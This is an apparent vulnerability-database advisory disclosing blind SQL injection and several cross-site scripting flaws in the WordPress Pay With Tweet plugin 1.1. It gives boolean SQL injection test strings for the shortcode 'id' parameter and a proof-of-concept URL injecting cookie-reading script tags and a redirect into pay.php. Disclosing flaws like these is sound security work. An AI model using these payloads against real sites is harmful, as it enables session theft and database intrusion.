Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities

2012.10.16
Credit: Gianluca Brindisi
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2012-5350
CWE: CWE-79
CWE-89


CVSS Base Score: 6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities # Date: 01/06/2012 # Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/) # Software Link: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip # Version: 1.1 1) Blind SQL Injection in shortcode: Short code parameter 'id' is prone to blind sqli, you need to be able to write a post/page to exploit this: [paywithtweet id="1' AND 1=2"] [paywithtweet id="1' AND 1=1"] 2) Multiple XSS in pay.php http://target.com/wp-content/plugins/pay-with-tweet.php/pay.php After connecting to twitter: ?link=&22></input>[XSS] After submitting the tweet: ?title=[XSS]&dl=[REDIRECT-TO-URL]%27)">[XSS] The final download link will be replaced with [REDIRECT-TO-URL] POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"><script>alert(document.cookie)</script>

References:

http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top